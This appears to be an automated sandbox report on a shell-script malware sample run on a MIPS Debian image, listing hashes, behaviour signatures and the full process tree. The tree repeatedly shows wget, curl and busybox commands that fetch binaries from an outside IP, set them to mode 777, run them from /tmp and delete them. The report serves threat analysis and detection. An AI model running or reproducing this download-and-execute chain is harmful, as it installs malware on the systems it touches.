Analysis
-
max time kernel
70s -
max time network
72s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
25/10/2024, 01:33
Static task
static1
Behavioral task
behavioral1
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
-
Size
10KB
-
MD5
766dedc13963c6b6ee0d4904bf619106
-
SHA1
3b93a1c4a9df4d54c75ef3b445ca55244506866c
-
SHA256
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264
-
SHA512
708c383986fa3596893356ad7ced7c503f4bdab762a319ff71291af63bf23e29ce72ae833bc4f47293c9031f7b78bc55a6a61f9d67585f39fb2412103eb6875b
-
SSDEEP
192:jbYbCQCoCnCuCKCzIkq3VdEZ1KVdEZ1PCQCoCnCuCKCEt:/YbCQCoCnCuCKCzIkqWCQCoCnCuCKCQ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh/tmp/506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh1⤵PID:711
-
/bin/rm/bin/rm bins.sh2⤵PID:715
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:721
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:733
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:739
-
-
/bin/chmodchmod 777 UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW./UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:744
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:745
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:747
-
-
/bin/chmodchmod 777 SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc./SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:750
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:751
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:753
-
-
/bin/chmodchmod 777 LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt./LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- Executes dropped EXE
PID:755
-
-
/bin/rmrm LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:758
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- Reads runtime system information
- Writes file to tmp directory
PID:768
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:776
-
-
/bin/chmodchmod 777 LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- File and Directory Permissions Modification
PID:782
-
-
/tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517./LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- Executes dropped EXE
PID:783
-
-
/bin/rmrm LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:786
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:787
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:794
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:806
-
-
/bin/chmodchmod 777 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT./2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:813
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:814
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:816
-
-
/bin/chmodchmod 777 iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal./iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:819
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:820
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:822
-
-
/bin/chmodchmod 777 TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62./TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:825
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:826
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:854
-
-
/bin/chmodchmod 777 YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1./YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:864
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:865
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:867
-
-
/bin/chmodchmod 777 jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV./jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:870
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:871
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:873
-
-
/bin/chmodchmod 777 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB./51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:879
-
-
/bin/chmodchmod 777 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF./6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:885
-
-
/bin/chmodchmod 777 LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U./LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:891
-
-
/bin/chmodchmod 777 sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES./sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:897
-
-
/bin/chmodchmod 777 KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB./KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:903
-
-
/bin/chmodchmod 777 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB./51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:909
-
-
/bin/chmodchmod 777 iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal./iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:915
-
-
/bin/chmodchmod 777 TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62./TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:921
-
-
/bin/chmodchmod 777 YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1./YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:924
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:925
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:927
-
-
/bin/chmodchmod 777 jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV./jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:930
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:931
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:933
-
-
/bin/chmodchmod 777 LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U./LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:936
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:937
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:939
-
-
/bin/chmodchmod 777 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF./6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:942
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:943
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:945
-
-
/bin/chmodchmod 777 KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB./KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:948
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:949
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:951
-
-
/bin/chmodchmod 777 sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES./sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:954
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:955
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:957
-
-
/bin/chmodchmod 777 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT./2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:960
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:961
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:963
-
-
/bin/chmodchmod 777 UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW./UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:966
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:967
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:969
-
-
/bin/chmodchmod 777 SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc./SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:972
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:973
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:975
-
-
/bin/chmodchmod 777 LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt./LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:978
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:979
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- Reads runtime system information
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:981
-
-
/bin/chmodchmod 777 LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517./LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:984
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97